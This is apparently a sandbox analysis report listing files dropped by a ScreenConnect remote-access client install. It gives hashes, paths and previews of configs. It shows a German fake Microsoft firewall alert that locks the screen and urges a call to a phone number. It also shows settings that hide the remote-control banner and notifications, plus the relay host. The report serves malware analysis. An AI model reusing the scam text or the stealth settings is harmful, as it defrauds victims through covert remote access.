                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.2.9083" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.2.9083" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95512
                                                                                                                                                                                                                                        Entropy (8bit):6.50477752737346
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:ig1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgsU0HMF7aw:zhbNDxZGXfdHrX7rAc6myJkgsU0H2B
                                                                                                                                                                                                                                        MD5:0282251F1E4AF3F721D7192118A8FD2F
                                                                                                                                                                                                                                        SHA1:333A207282B5127674560B2F290D890214FCFA7A
                                                                                                                                                                                                                                        SHA-256:906075E5A4CEDF4793EF18C4C8DA01B0E8798E9EEBCBC2287BA1F470CAFBDAF5
                                                                                                                                                                                                                                        SHA-512:80FDA5639D41F924C6A0C2E1D798A5433DD1C6043C6E9A03EB1CE0CEF7D75339676743E7BEF4A4C8D548B9FE293CC591822B4FEB77FCF61F84EAD4C13EDCBC6C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):61208
                                                                                                                                                                                                                                        Entropy (8bit):6.323071111905421
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6yot+ktY7OUZXPGQDvmDtyQXIE+TCBtIfXWbJe79o7p:6yYtxURPGZyQVwWem
                                                                                                                                                                                                                                        MD5:9191DE53DBFFC88DDBF49B88CC124B74
                                                                                                                                                                                                                                        SHA1:BAD54B6C1EDB1D37158BF3EEA16B0253452F9445
                                                                                                                                                                                                                                        SHA-256:7205B27FCEB210388597BEDD40786809EEC51163225ED6BBA9E7BC0FBB6B8A65
                                                                                                                                                                                                                                        SHA-512:341FA333A23737D6A79A3C98D317E30EEC7BD23C5DD42742603EB900F5DF654ADEAD2CD4B82132B6F614755D5ECBC0E4D7CBCA36240E93CCAB1042EF51C28417
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):81688
                                                                                                                                                                                                                                        Entropy (8bit):5.8621631504225675
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:Wty/l44QzbkI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7/T7r3:VdxukLdjTP
                                                                                                                                                                                                                                        MD5:0EE5B092F5EFFA84DB5A1CE93417D8C1
                                                                                                                                                                                                                                        SHA1:21FF86BB144960D36628D649EB1485A646987E02
                                                                                                                                                                                                                                        SHA-256:5859F53DCB98ECB2C427E56BB95A71A1DA8B9937128BF49C82EC17EBE948EA80
                                                                                                                                                                                                                                        SHA-512:A6F6DC72AA5C4C8C9E7B0D03BB710D5B44F90B19EB44BC31DC6B020E685E4F985622A978E775CF892C52CAA679ED78E4ECF0BC03E5D8152A54C1ED8FA88BEBC3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):549888
                                                                                                                                                                                                                                        Entropy (8bit):6.035813011819646
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:qL2DLhOnlTQatfpw7TkJ9/KeZBFR/Zw7VTcWt5jv8jyEzR39GBCquq1MSRq/sree:qLMhOeM52aBFcTbkdqRR6EX
                                                                                                                                                                                                                                        MD5:DA6B59FA5636B53C758E796A3226ADB7
                                                                                                                                                                                                                                        SHA1:3B6DC82FFD7097455E703C1FC729A1D0F8815898
                                                                                                                                                                                                                                        SHA-256:CCE6DC73141C3E41E026131967AF21BEF625F903FA275913598A55B4D4997678
                                                                                                                                                                                                                                        SHA-512:760B5A348D8E4CA1DEC36420F2C1B979F715650EA691235C2053D5DDCE5228D0652C9FF7A420717A1290F001C8DDB88C83ABC65FFE892DAFF6761B12C0588CBA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1726976
                                                                                                                                                                                                                                        Entropy (8bit):6.640049744810174
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:cOgsFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUTM:FgsJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                        MD5:7E3BCFD89F41083DD30725A9F9C4D0C9
                                                                                                                                                                                                                                        SHA1:B68092FDCF113381B31861C79394AFA0E235252E
                                                                                                                                                                                                                                        SHA-256:FE8C56F3CD7D2EF529DF28756F8C9F961F0DDC81B1F1FBEAC7CE69011AD06E74
                                                                                                                                                                                                                                        SHA-512:C93D0EFD94CD4A34C30816B0371A698187AFFBFA9D74F91E93C48EC69CB7BD94A03ECCC0D6039013ABA7BF6EA16B9ADF996F40562208AEF752B93CCE6EA7FCA3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):602392
                                                                                                                                                                                                                                        Entropy (8bit):6.179677334154197
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:ayB4P+n4htgqvqURfRa5CgSM4ZrvR/YKcSAwqrKyKKj414Sc4q2/R4IEyCui5AS2:FB4KsgqyUuiXrveKtCa3CNax
                                                                                                                                                                                                                                        MD5:E1E1E3C901F0DEC41B87113165A30ACB
                                                                                                                                                                                                                                        SHA1:AC5F3D13A4084D53D3E0CCE104A9284D998E2B1A
                                                                                                                                                                                                                                        SHA-256:C59947E7D0477E143B3EE9A63F60096F24A07AC4FC018F061473F6D548CBECA4
                                                                                                                                                                                                                                        SHA-512:48716CAF09228AF3D9CD34772AC64CCFFE9FC292EF6CDCC926E885FC10A1BF97B2E889A5F8577CD3C0E55FF00EBD436112ABC1D9B12F57C23B43CC29A1B58172
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_b52ff71be5e12d6d\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):197120
                                                                                                                                                                                                                                        Entropy (8bit):6.586698462937567
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:zxLtNGBlIyS7/OXjusqVFJRJcyzvyqSmzDvJXYz:htNGBGySaXqPJY5qSmG
                                                                                                                                                                                                                                        MD5:5F31CB0A5524DF64FEFF668D581F075E
                                                                                                                                                                                                                                        SHA1:F111EFE5C55E42BE6CE2ED9E5703E30A5D743D43
                                                                                                                                                                                                                                        SHA-256:47D471E33377DB7F96FF84B4CFCC420CF770A77219BCB0CE55446490211A5DF3
                                                                                                                                                                                                                                        SHA-512:0DEB969C51D1A7B1A8B608BD47A77940E6A88E8AAD7534800C2C2D5DFDFC298F02128C8D9742ABE3019D9EBEB5906185D6C3DD159C29749B2A903F04A28B18E6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):582
                                                                                                                                                                                                                                        Entropy (8bit):5.030538403989238
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONl7Y8qqpCDYJ/vXbAa3xT:2dL9hK6E46YPRNYYhvH
                                                                                                                                                                                                                                        MD5:BB6B4EE5CC71E45AAC2211191C42CF0C
                                                                                                                                                                                                                                        SHA1:170ADD895864294F2A8A29BDDF0950A6826DA5CE
                                                                                                                                                                                                                                        SHA-256:27B09BBE2B6D0B4F392960324E7CB772649808ACB3EBE131FD9CDE638C8AADF6
                                                                                                                                                                                                                                        SHA-512:033D0602F07D37B9A02765B204D3E0DAC5AA4C98C7D665257C12FF583D2FB05648842924098D97C52C1D7E8A30CF87C51966A6100934514245BD75E74B4F7546
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-l7g4dh-relay.screenconnect.com=147.75.81.4-20%2f12%2f2024%2017%3a23%3a19</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):582
                                                                                                                                                                                                                                        Entropy (8bit):5.028155548408631
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONl7Y8qqpCDYHv/vXbAa3xT:2dL9hK6E46YPRNYYXvH
                                                                                                                                                                                                                                        MD5:ADE9656BFE9F73F3C2C3248660D09E1A
                                                                                                                                                                                                                                        SHA1:14EABB2A06324B4772EAEA06B8A9CF052694A751
                                                                                                                                                                                                                                        SHA-256:7571A5D9AF8C14DE5B9584F8DBF4FFAB3F84B538D57F8BC9A94E34DD1287109E
                                                                                                                                                                                                                                        SHA-512:1BA5056912FCF4B9A48F601856AB0B70A53F44121EC0CAF2CE034E1561AC817C425B2F4B96EF719BF0497218C5D57CF2F9E4CD350407FFFA2F44250A22F34069
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-l7g4dh-relay.screenconnect.com=147.75.81.4-20%2f12%2f2024%2017%3a23%3a17</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):469
                                                                                                                                                                                                                                        Entropy (8bit):5.1947802885938765
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:rHy2DLI4MWoj12tyiUPDLdex+so94yZ+z4eBW5/ojt:zHE40CyiU7kx+ztpsW5wjt
                                                                                                                                                                                                                                        MD5:87AFFF981C910A9EB12EB029BD9E7EA3
                                                                                                                                                                                                                                        SHA1:773092BD0A0CF3FBC7DFB613EA2286970A447D04
                                                                                                                                                                                                                                        SHA-256:A75C86E6AF09D1142FCEB4BD03D4B9AE99EB8CED2DF18B7BB0BCC3C02EBD7BC7
                                                                                                                                                                                                                                        SHA-512:093754DD7069C2010ED2E9BFFE50B7B9446BCA0FB9BF938C6764E63B3E9B41B1E931A454F1C1A51E0EB3690C5F17F9A370390D4530FE7DE0E701A62BBA1258B9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.2..........2B.l.a.n.k.M.o.n.i.t.o.r.M.e.s.s.a.g.e.F.o.r.m.a.t........Microsoft Windows Firewall Alert. Bedrohung erkannt: Pornografische Spyware(Fehler Code: 2V7HGTVB). Der Zugriff auf diesen PC wurde aus Sicherheitsgr.nden gesperrt. Rufen Sie sofort den Microsoft-Support an: 02113 853 9798
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):50133
                                                                                                                                                                                                                                        Entropy (8bit):4.759054454534641
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                                                                                        MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                                                                                        SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                                                                                        SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                                                                                        SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):26722
                                                                                                                                                                                                                                        Entropy (8bit):7.7401940386372345
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                                                                                        MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                                                                                        SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                                                                                        SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                                                                                        SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2521
                                                                                                                                                                                                                                        Entropy (8bit):4.722241607101165
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:Wh95AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdHeGH3dHYE:A92H82HzHAHyHVHeHMHZHUH1HyHkHNHf
                                                                                                                                                                                                                                        MD5:12BCC42E00642FCAB74FCC3278280476
                                                                                                                                                                                                                                        SHA1:B92BEDB9510465FD9BCB2A533BD2036ACA651BC4
                                                                                                                                                                                                                                        SHA-256:5CA9095363FC45B593A7E632F964A615FD61DBBED2DA792C91DD1854EFC77C89
                                                                                                                                                                                                                                        SHA-512:692CC402BC22E55D79C4C4B5097BF48F65D813C0E28CA176C71E783DE621ECA5EAAFB745C9EDA534857776D3B014088DCC0116FBB9DC13BCC4A6D3285FC24A69
                                                                                                                                                                                                                                        Malicious:false
Preview:
<configuration>
  <configSections>
    <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />
  </configSections>
  <ScreenConnect.ApplicationSettings>
    <setting name="SupportShowUnderControlBanner" serializeAs="String">
      <value>false</value>
    </setting>
    <setting name="AccessShowUnderControlBanner" serializeAs="String">
      <value>false</value>
    </setting>
    <setting name="SupportHideWallpaperOnConnect" serializeAs="String">
      <value>false</value>
    </setting>
    <setting name="AccessHideWallpaperOnConnect" serializeAs="String">
      <value>false</value>
    </setting>
    <setting name="HideWallpaperOnConnect" serializeAs="String">
      <value>false</value>
    </setting>
    <setting name="SupportShowBalloonOnConnect" serializeAs="String">
      <value>false</value>
    </setting>
    <setting name="AccessShowBalloonOnConnect" serializeAs="String">
      <value>false</value>
    </
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):582
                                                                                                                                                                                                                                        Entropy (8bit):5.028155548408631
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONl7Y8qqpCDYC5/vXbAa3xT:2dL9hK6E46YPRNYYCRvH
                                                                                                                                                                                                                                        MD5:F2B508086B50069A37A6DBA07AF6CE62
                                                                                                                                                                                                                                        SHA1:DC53B1C2AD9C9ABA41F307E6CDB547029396133B
                                                                                                                                                                                                                                        SHA-256:31E3EB97C15C09ED60CBE9E875BC72099BE8F0F6679A9F409374021B8D8A83E8
                                                                                                                                                                                                                                        SHA-512:3124968125928CC8D206E11568BD4980113175FD713F434915F56AD0FB4C49F78D2FDC46B22A3C7A10AAD39094BD6D02497C6BC76A4863DFDABBCB6035EFFDAC
                                                                                                                                                                                                                                        Malicious:false
Preview:
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
  </configSections>
  <ScreenConnect.ApplicationSettings>
    <setting name="HostToAddressMap" serializeAs="String">
      <value>instance-l7g4dh-relay.screenconnect.com=147.75.81.4-20%2f12%2f2024%2017%3a23%3a14</value>
    </setting>
  </ScreenConnect.ApplicationSettings>
</configuration>
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):582
                                                                                                                                                                                                                                        Entropy (8bit):5.032078948580715
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONl7Y8qqpCDcJ/vXbAa3xT:2dL9hK6E46YPRNY6vH
                                                                                                                                                                                                                                        MD5:701E18B7C659CD6B9F92A1C6DE4A3439
                                                                                                                                                                                                                                        SHA1:131C4490F0BFB6FAC48732755664CA046EA92147
                                                                                                                                                                                                                                        SHA-256:722552B613566B31F2B4A4A08F850202B8C3110BEFAC97243F14FD44FB28404E
                                                                                                                                                                                                                                        SHA-512:144D075803A65C884F55CED118139F9921907F538920AE30D044C2AA8EEC999E4699D922D93AB9B2952C2A7BA9B987F3D0C52A8307B831FECA426CA4F13538C6
                                                                                                                                                                                                                                        Malicious:false
Preview:
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
  </configSections>
  <ScreenConnect.ApplicationSettings>
    <setting name="HostToAddressMap" serializeAs="String">
      <value>instance-l7g4dh-relay.screenconnect.com=147.75.81.4-20%2f12%2f2024%2017%3a23%3a59</value>
    </setting>
  </ScreenConnect.ApplicationSettings>
</configuration>
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):582
                                                                                                                                                                                                                                        Entropy (8bit):5.028331853275931
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONl7Y8qqpCD95m/vXbAa3xT:2dL9hK6E46YPRNYr8vH
                                                                                                                                                                                                                                        MD5:D50C74E9CB4114023EA898F4623E8233
                                                                                                                                                                                                                                        SHA1:24AF928C38EDEC65357652A6A71C9379F6306888
